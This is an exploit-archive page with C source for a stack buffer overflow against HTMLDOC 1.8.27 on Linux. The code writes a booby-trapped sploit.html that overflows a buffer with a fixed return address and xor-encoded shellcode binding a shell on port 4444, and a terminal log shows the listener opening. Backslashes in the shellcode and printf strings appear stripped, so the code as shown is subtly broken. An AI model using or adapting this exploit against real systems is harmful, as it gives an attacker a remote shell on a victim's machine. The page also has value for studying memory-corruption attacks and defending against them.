[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit
# Published : 2009-09-09
# Author : Pankaj Kohli
# Previous Title : Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)
# Next Title : Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [2] 


/*

HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux)
Reference: http://www.securityfocus.com/bid/35727

Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR)
Credit: ANTHRAX666 for finding the vulnerability

Coded by Pankaj Kohli
http://www.pank4j.com

pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space
2
pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f
pankaj@zion:~/test/htmldoc$ ./htmldocb0f

[*] Creating buffer
[*] Exploit file written to sploit.html
Run as: htmldoc -f somefile.pdf sploit.html

pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html &
[1] 3287
pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN

*/

#include <stdio.h>
#include <string.h>


/* Port binding (xor encoded) shellcode (port 4444) */
char code[] =
"xebx12x5bx31xc9xb1x75x8ax03x34"
"x1ex88x03x43x66x49x75xf5xebx05"
"xe8xe9xffxffxffx74x78x46x74x1f"
"x45x2fxd7x4fx74x1fx74x1cx97xff"
"xd3x9ex97xd8x2fxccx4cx78x76x0f"
"x42x78x76x1cx1ex97xffx74x0ex4f"
"x4ex97xffxadx1cx74x78x46xd3x9e"
"xaex78xadx1axd3x9ex4cx48x97xff"
"x5dx74x78x46xd3x9ex97xddx74x1c"
"x47x74x21x46xd3x9exfcxe7x74x21"
"x46xd3x9ex2fxccx4cx76x70x31x6d"
"x76x76x31x31x7cx77x97xfdx4cx78"
"x76x33x77x97xffx4cx4fx4dx97xff"
"x74x15x46xd3x9ex74x1fx46x2fxc5"
"xd3x9e";

long jmp = 0x0804d938;  // push esp; ret 0x0807;  ;-) 

int main(int argc, char **argv, char **envp) {
	char buff[512];
	int i;
	FILE *fd;

	printf("n[*] Creating buffern");
        strcpy(buff, "<!-- MEDIA SIZE 1x1");
        for(i=0; i<275; i++) {
                buff[19+i] = 'A';
        }

	buff[294] = jmp & 0x000000ff;
	buff[295] = (jmp & 0x0000ff00) >> 8;
	buff[296] = (jmp & 0x00ff0000) >> 16;
	buff[297] = (jmp & 0xff000000) >> 24;
	buff[298] = 0;

	strcat(buff, code);

	fd = fopen("sploit.html", "wb");
	fprintf(fd, "%s", buff);
	fclose(fd);
	printf("[*] Exploit file written to sploit.htmln");
	printf("Run as: htmldoc -f somefile.pdf sploit.htmlnn");

	return 0;
}

// www.Syue.com [2009-09-09]